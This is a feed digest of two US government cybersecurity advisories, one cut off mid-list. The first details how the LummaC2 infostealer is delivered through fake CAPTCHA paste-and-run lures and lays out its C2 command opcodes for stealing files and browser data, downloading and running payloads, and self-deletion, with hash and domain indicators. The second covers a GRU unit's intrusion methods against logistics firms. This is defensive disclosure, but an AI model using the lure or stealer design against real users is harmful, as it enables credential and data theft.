CB Alerts http://feed.informer.com/digests/VWPN6WKFZX/feeder CB Alerts Respective post owners and feed distributors Sun, 11 Jan 2015 23:04:06 +0000 Feed Informer http://feed.informer.com/ Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b US-CERT Alerts urn:uuid:6277f226-4f12-f336-818e-33d36098ec04 Tue, 20 May 2025 19:20:23 +0000 <h2><strong>Summary</strong></h2> <p>The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.</p> <p>The FBI and CISA encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of LummaC2 malware.</p> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-05/aa25-141b-threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations.pdf" class="c-file__link" target="_blank">AA25-141B Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations</a> <span class="c-file__size">(PDF, 1.28 MB )</span> </div> </div> <p>For a downloadable copy of IOCs, see:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-05/AA25-141B.stix_.xml" class="c-file__link" target="_blank">AA25-141B STIX XML</a> <span class="c-file__size">(XML, 146.54 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-05/AA25-141B-Threat-Actors-Deploy-LummaC2-Malware-to-Exfiltrate-Sensitive-Data-from-Organizations.stix_.json" class="c-file__link" target="_blank">AA25-141B STIX JSON</a> <span class="c-file__size">(JSON, 300.90 KB )</span> </div> </div> <h2><strong>Technical Details</strong></h2> <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK® Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 17. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for threat actor activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Overview</h3> <p>LummaC2 malware first appeared for sale on multiple Russian-language speaking cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/001/" target="_blank" title="T1566.001">T1566.001</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" title="T1566.002">T1566.002</a>]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to then open the Windows Run window (Windows Button + R) and paste clipboard contents (“CTRL + V”). After users press “enter” a subsequent Base64-encoded PowerShell process is executed.</p> <p>To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (i.e., multimedia player or utility software) [<a href="https://attack.mitre.org/versions/v17/techniques/T1036/" target="_blank" title="T1036">T1036</a>]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [<a href="https://attack.mitre.org/versions/v17/techniques/T1027/" target="_blank" title="T1027">T1027</a>].</p> <p>Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [<a href="https://attack.mitre.org/versions/v17/tactics/TA0010/" target="_blank" title="TA0010">TA0010</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1119/" target="_blank" title="T1119">T1119</a>]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.</p> <h3>File Execution</h3> <p>Upon execution, the <code>LummaC2.exe</code> file will enter its main routine, which includes four sub-routines (see <strong>Figure 1</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%201%20-%20LummaC2%20Main%20Routine.png?itok=4-3q4JJo" width="653" height="185" alt="Figure 1. LummaC2 Main Routine"> </div> <figcaption class="c-figure__caption"><em>Figure 1. LummaC2 Main Routine</em></figcaption> </figure> <p>The first routine decrypts strings for a message box that is displayed to the user (see <strong>Figure 2</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%202%20-%20Message%20Box.png?itok=ORRAaghu" width="660" height="157" alt="Figure 2. Message Box"> </div> <figcaption class="c-figure__caption"><em>Figure 2. Message Box</em></figcaption> </figure> <p>If the user selects <code>No</code>, the malware will exit. If the user selects <code>Yes</code>, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [<a href="https://attack.mitre.org/versions/v17/techniques/T1140/" target="_blank" title="T1140">T1140</a>]. A list of observed domains is included in the <strong>Indicators of Compromise</strong> section.</p> <p>After each domain is decoded, the implant will attempt a <code>POST</code> request [<a href="https://attack.mitre.org/versions/v17/techniques/T1071/001/" target="_blank" title="T1071.001">T1071.001</a>] (see <strong>Figure 3</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%203%20-%20Post%20Request.png?itok=nPWt04-t" width="648" height="143" alt="Figure 3. Post Request"> </div> <figcaption class="c-figure__caption"><em>Figure 3. </em><code><em>Post</em></code><em> Request</em></figcaption> </figure> <p>If the <code>POST</code> request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see <strong>Figure 4</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%204%20-%20Code%20Saving%20Successful%20Callback%20Request.png?itok=txJPFJab" width="660" height="152" alt="Figure 4. Code Saving Successful Callback Request"> </div> <figcaption class="c-figure__caption"><em>Figure 4. Code Saving Successful Callback Request</em></figcaption> </figure> <p>Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) <code>GetUserNameW</code> and <code>GetComputerNameW</code> respectively [<a href="https://attack.mitre.org/versions/v17/techniques/T1012/" target="_blank" title="T1012">T1012</a>]. The returned data is then hashed and compared against a hard-coded hash value (see <strong>Figure 5</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%205%20-%20User%20and%20Computer%20Name%20Check.png?itok=ZYtbs3GM" width="655" height="175" alt="Figure 5. User and Computer Name Check"> </div> <figcaption class="c-figure__caption"><em>Figure 5. User and Computer Name Check</em></figcaption> </figure> <p>The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value.</p> <p>If the username hash is equal to the value <code>0x56CF7626</code>, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of <code>0xB09406C7</code>. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username.</p> <p>If the username and hostname check function returns <code>zero</code> (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following <code>POST</code> request (see <strong>Figure 6</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%206%20-%20Second%20POST%20Request.png?itok=4cdoQzJY" width="648" height="143" alt="Figure 6. Second POST Request"> </div> <figcaption class="c-figure__caption"><em>Figure 6. Second </em><code><em>POST</em></code><em> Request</em></figcaption> </figure> <p>The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware. The C2 uses the JSON configuration to parse its browser extensions and target lists using the <code>ex</code> key, which contains an array of objects (see <strong>Figure 7</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%207%20-%20Parsing%20of%20ex%20JSON%20Value.png?itok=rotohQzR" width="656" height="52" alt="Figure 7. Parsing of ex JSON Value"> </div> <figcaption class="c-figure__caption"><em>Figure 7. Parsing of </em><code><em>ex</em></code><em> JSON Value</em></figcaption> </figure> <p>Parsing the <code>c</code> key contains an array of objects, which will give the implant its C2 (see <strong>Figure 8</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%208%20-%20Parsing%20of%20c%20JSON%20Value.png?itok=CH958VKZ" width="658" height="91" alt="Figure 8. Parsing of c JSON Value"> </div> <figcaption class="c-figure__caption"><em>Figure 8. Parsing of </em><code><em>c</em></code><em> JSON Value</em></figcaption> </figure> <h3>C2 Instructions</h3> <p>Each array object that contains the JSON key value of <code>t</code> will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.</p> <h4><strong>1. Opcode </strong><code><strong>0</strong></code><strong> – Steal Data Generic</strong></h4> <p>This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode <code>O</code> command option allows LummaC2 affiliates to add their custom information gathering details (see <strong>Table 1</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;2. Opcode </em><code><em>1</em></code><em> Options</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>p</td> <td>Path to steal from</td> </tr> <tr> <td>m</td> <td>File extensions to read</td> </tr> <tr> <td>z</td> <td>Output directory to store stolen data</td> </tr> <tr> <td>d</td> <td>Depth of recursiveness</td> </tr> <tr> <td>fs</td> <td>Maximum file size</td> </tr> </tbody> </table> <h4><strong>2. Opcode </strong><code><strong>1</strong></code><strong> – Steal Browser Data</strong></h4> <p>This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [<a href="https://attack.mitre.org/versions/v17/techniques/T1217/" target="_blank" title="T1217">T1217</a>] (see <strong>Table 2</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 2. Opcode </em><code><em>1</em></code><em> Options</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>p</td> <td>Path to steal from</td> </tr> <tr> <td>z</td> <td>Name of Browser – Output</td> </tr> </tbody> </table> <h4><strong>3. Opcode </strong><code><strong>2</strong></code><strong> – Steal Browser Data (Mozilla)</strong></h4> <p>This command is identical to Opcode <code>1</code>; however, this option seems to be utilized solely for Mozilla browser data (see <strong>Table 3</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 3. Opcode </em><code><em>2</em></code><em> Options</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>p</td> <td>Path to steal from</td> </tr> <tr> <td>z</td> <td>Name of Browser – Output</td> </tr> </tbody> </table> <h4><strong>4. Opcode </strong><code><strong>3</strong></code><strong> – Download a File</strong></h4> <p>This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with <code>u</code> to download and create the extension specified in the <code>ft</code> key [<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a>] (see <strong>Table 4</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 4. Opcode </em><code><em>3</em></code><em> Options</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>u</td> <td>URL for Download</td> </tr> <tr> <td>ft</td> <td>File Extension</td> </tr> <tr> <td>e&nbsp;</td> <td>Execution Type</td> </tr> </tbody> </table> <p>The <code>e</code> value can take two values: <code>0</code> or <code>1</code>. This specifies how to execute the downloaded file either with the <code>LoadLibrary</code> API or via the command line with <code>rundll32.exe</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1106/" target="_blank" title="T1106">T1106</a>] (see <strong>Table 5</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;5. Execution Types</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>e=0</td> <td>Execute with <code>LoadLibraryW()</code></td> </tr> <tr> <td>e=1</td> <td>Executive with <code>rund1132.exe</code></td> </tr> </tbody> </table> <h4><strong>5. Take Screenshot</strong></h4> <p>If the configuration JSON file has a key of “<code>se</code>” and its value is “<code>true</code>,” the malware will take a screenshot in BMP format and upload it to the C2 server.</p> <h4><strong>6. Delete Self</strong></h4> <p>If the configuration JSON file has a key of “<code>ad</code>” and its value is “<code>true</code>,” the malware will enter a routine to delete itself.</p> <p>The command shown in <strong>Figure 9</strong> will be decoded and executed for self-deletion.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%209%20-%20Self-Deletion%20Command%20Line.png?itok=BqtyYanh" width="649" height="44" alt="Figure 9. Self-Deletion Command Line"> </div> <figcaption class="c-figure__caption"><em>Figure 9. Self-Deletion Command Line</em></figcaption> </figure> <p><strong>Figure 10</strong> depicts the above command line during execution.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%2010%20-%20Decoded%20Command%20Line%20in%20Memory.png?itok=QsVu940K" width="662" height="192" alt="Figure 10. Decoded Command Line in Memory"> </div> <figcaption class="c-figure__caption"><em>Figure 10. Decoded Command Line in Memory</em></figcaption> </figure> <h3>Host Modifications</h3> <p>Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a>]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.</p> <h3>Decrypted Strings</h3> <p>Below is a list of hard-coded decrypted strings located in the binary (see <strong>Figure 11</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%2011%20-%20Decoded%20Strings.png?itok=4A8LZC0N" width="653" height="355" alt="Figure 11. Decoded Strings"> </div> <figcaption class="c-figure__caption"><em>Figure 11. Decoded Strings</em></figcaption> </figure> <h2><strong>Indicators of Compromise</strong></h2> <p>See <strong>Table 6</strong> and <strong>Table 7</strong> for LummaC2 IOCs obtained by the FBI and trusted third parties.</p> <p><strong>Disclaimer:</strong> The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 6. LummaC2 Executable Hashes</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Executables</th> <th role="columnheader">Type</th> </tr> </thead> <tbody> <tr> <td>4AFDC05708B8B39C82E60ABE3ACE55DB (<code>LummaC2.exe</code> from November 2023)</td> <td>MD5</td> </tr> <tr> <td>E05DF8EE759E2C955ACC8D8A47A08F42 (<code>LummaC2.exe</code> from November 2023)</td> <td>MD5</td> </tr> <tr> <td>C7610AE28655D6C1BCE88B5D09624FEF</td> <td>MD5</td> </tr> <tr> <td>1239288A5876C09D9F0A67BCFD645735168A7C80 (<code>LummaC2.exe</code> from November 2023)</td> <td>SHA1</td> </tr> <tr> <td>B66DA4280C6D72ADCC68330F6BD793DF56A853CB (<code>LummaC2.exe</code> from November 2023)</td> <td>SHA1</td> </tr> <tr> <td>3B267FA5E1D1B18411C22E97B367258986E871E5</td> <td>TLSH</td> </tr> <tr> <td>19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023)</td> <td>SHA256</td> </tr> <tr> <td>2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (<code>LummaC2.exe</code> from November 2023)</td> <td>SHA256</td> </tr> <tr> <td>4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D</td> <td>SHA256</td> </tr> <tr> <td>325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a</td> <td>SHA256</td> </tr> <tr> <td>76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c</td> <td>SHA256</td> </tr> <tr> <td>7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70</td> <td>SHA256</td> </tr> <tr> <td>a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab</td> <td>SHA256</td> </tr> <tr> <td>b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959</td> <td>SHA256</td> </tr> <tr> <td>ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b</td> <td>SHA256</td> </tr> </tbody> </table> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 7. LummaC2 DLL Binaries</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">DLL Binaries</th> <th role="columnheader">Type</th> </tr> </thead> <tbody> <tr> <td>iphlpapi.dll</td> <td>IP Helper API</td> </tr> <tr> <td>winhttp.dll</td> <td>Windows HTTP Services</td> </tr> </tbody> </table> <p>The following are domains observed deploying LummaC2 malware.</p> <div class="WordSection1"> <p><strong>Disclaimer:</strong> The domains below are historical in nature and may not currently be malicious.</p> </div> <div class="WordSection2"> <ul> <li>Pinkipinevazzey[.]pw</li> <li>Fragnantbui[.]shop</li> <li>Medicin Russian GRU Targeting Western Logistics Entities and Technology Companies https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a US-CERT Alerts urn:uuid:09300ecc-4879-9553-19bd-fa896ef70516 Mon, 12 May 2025 16:49:12 +0000 <h2><strong>Executive Summary</strong></h2> <p>This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#CybersecurityIndustryTracking" title="CybersecurityIndustryTracking">Cybersecurity Industry Tracking</a>”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.</p> <p>Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.</p> <p>This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.</p> <p>The following authors and co-sealers are releasing this CSA:</p> <ul> <li>United States National Security Agency (NSA)</li> <li>United States Federal Bureau of Investigation (FBI)</li> <li>United Kingdom National Cyber Security Centre (NCSC-UK)</li> <li>Germany Federal Intelligence Service (BND)&nbsp;Bundesnachrichtendienst</li> <li>Germany Federal Office for Information Security (BSI)&nbsp;Bundesamt für Sicherheit in der Informationstechnik</li> <li>Germany Federal Office for the Protection of the Constitution (BfV)&nbsp;Bundesamt für Verfassungsschutz</li> <li>Czech Republic Military Intelligence (VZ)&nbsp; Vojenské zpravodajství</li> <li>Czech Republic National Cyber and Information Security Agency (NÚKIB)&nbsp;Národní úřad pro kybernetickou a informační bezpečnost</li> <li>Czech Republic Security Information Service (BIS)&nbsp;Bezpečnostní informační služba</li> <li>Poland Internal Security Agency (ABW)&nbsp;Agencja Bezpieczeństwa Wewnętrznego</li> <li>Poland Military Counterintelligence Service (SKW)&nbsp;Służba Kontrwywiadu Wojskowego</li> <li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li> <li>United States Department of Defense Cyber Crime Center (DC3)</li> <li>United States Cyber Command (USCYBERCOM)</li> <li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li> <li>Canadian Centre for Cyber Security (CCCS)</li> <li>Danish Defence Intelligence Service (DDIS)&nbsp;Forsvarets Efterretningstjeneste</li> <li>Estonian Foreign Intelligence Service (EFIS)&nbsp;Välisluureamet</li> <li>Estonian National Cyber Security Centre (NCSC-EE)&nbsp;Küberturvalisuse keskus</li> <li>French Cybersecurity Agency (ANSSI)&nbsp;Agence nationale de la sécurité des systèmes d'information</li> <li>Netherlands Defence Intelligence and Security Service (MIVD)&nbsp;Militaire Inlichtingen- en Veiligheidsdienst<br>&nbsp;</li> </ul> <p>Download the PDF version of this report:</p> <p><a href="https://media.defense.gov/2025/May/21/2003719846/-1/-1/0/CSA_RUSSIAN_GRU_TARGET_LOGISTICS.PDF" target="_blank" title="Russian GRU Targeting Western Logistics Entities and Technology Companies ">Russian GRU Targeting Western Logistics Entities and Technology Companies</a> (PDF, 1,081KB)</p> <p>For a downloadable list of IOCs, visit:</p> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-05/AA25-141A-Russian-GRU-Targeting-Western-Logistics-Entities-and-Technology-Companies.stix_.xml" class="c-file__link" target="_blank">AA25-141A STIX XML</a> <span class="c-file__size">(XML, 117.02 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-05/AA25-141A-Russian-GRU-Targeting-Western-Logistics-Entities-and-Technology-Companies.stix_.json" class="c-file__link" target="_blank">AA25-141A STIX JSON</a> <span class="c-file__size">(JSON, 144.29 KB )</span> </div> </div> <h2><strong>Introduction</strong></h2> <p>For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.<br>In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence—with unit 26165 predominately involved in espionage. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited1" title="1">1</a>] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine’s territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments.<br>Note: This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 17. See <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#appendixa" title="Appendix A">Appendix A: MITRE ATT&amp;CK tactics and techniques</a> for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques. This advisory uses the MITRE D3FEND® framework, version 1.0.</p> <h2><strong>Description of Targets</strong></h2> <p>The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations:&nbsp;</p> <ul> <li>&nbsp;Defense Industry</li> <li>Transportation and Transportation Hubs (ports, airports, etc.)</li> <li>Maritime</li> <li>Air Traffic Management</li> <li>IT Services</li> </ul> <p>In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [<a href="https://attack.mitre.org/versions/v17/techniques/T1199/" target="_blank" title="T1199">T1199</a>].</p> <p>The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [<a href="https://attack.mitre.org/versions/v17/tactics/TA0043/" target="_blank" title="TA0043">TA0043</a>].</p> <p>The countries with targeted entities include the following, as illustrated in Figure 1:</p> <ul> <li>Bulgaria</li> <li>Czech Republic</li> <li>France</li> <li>Germany</li> <li>Greece</li> <li>Italy</li> <li>Moldova</li> <li>Netherlands</li> <li>Poland</li> <li>Romania</li> <li>Slovakia</li> <li>Ukraine</li> <li>United States<br>&nbsp;</li> </ul> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Countries%20with%20Targeted%20Entities.png?itok=UKD_QLvF" width="975" height="308" alt="Map demonstrating Targeted Entities"> </div> <figcaption class="c-figure__caption">Figure 1: Countries with Targeted Entities</figcaption> </figure> <h2><strong>Initial Access TTPs</strong></h2> <p>To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to):</p> <ul> <li>Credential guessing [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001">T1110.001</a>] / brute force [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>]</li> <li>Spearphishing for credentials [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/" target="_blank" title="T1566">T1566</a>]</li> <li>Spearphishing delivering malware [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/" target="_blank" title="T1566">T1566</a>]</li> <li>Outlook NTLM vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-23397" target="_blank" title="CVE-2023-23397">CVE-2023-23397</a>)</li> <li>Roundcube vulnerabilities (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12641" target="_blank" title="CVE-2020-12641">CVE-2020-12641</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-35730" target="_blank" title="CVE-2020-35730">CVE-2020-35730</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44026" target="_blank" title="CVE-2021-44026">CVE-2021-44026</a>)</li> <li>Exploitation of Internet-facing infrastructure, including corporate VPNs [<a href="https://attack.mitre.org/versions/v17/techniques/T1133/" target="_blank" title="T1133">T1133</a>], via public vulnerabilities and SQL injection [<a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a>]</li> <li>Exploitation of WinRAR vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" title="CVE-2023-38831">CVE-2023-38831</a>)</li> </ul> <p>The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [<a href="https://attack.mitre.org/versions/v17/techniques/T1665/" target="_blank" title="T1665">T1665</a>]. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited2" title="2">2</a>]</p> <h3>Credential Guessing/Brute Force</h3> <p>Unit 26165 actors’ credential guessing [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001">T1110.001</a>] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA “<a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank" title="Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments">Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments</a>.”&nbsp;[<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited3" title="3">3</a>] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/003/" target="_blank" title="T1090.003">T1090.003</a>]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [<a href="https://attack.mitre.org/versions/v17/techniques/T1573/" target="_blank" title="T1573">T1573</a>].&nbsp;</p> <h3>Spearphishing</h3> <p>GRU unit 26165 actors’ spearphishing emails included links [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>] leading to fake login pages impersonating a variety of government entities and Western cloud email providers’ webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1586/002/" target="_blank" title="T1586.002">T1586.002</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1586/003/" target="_blank" 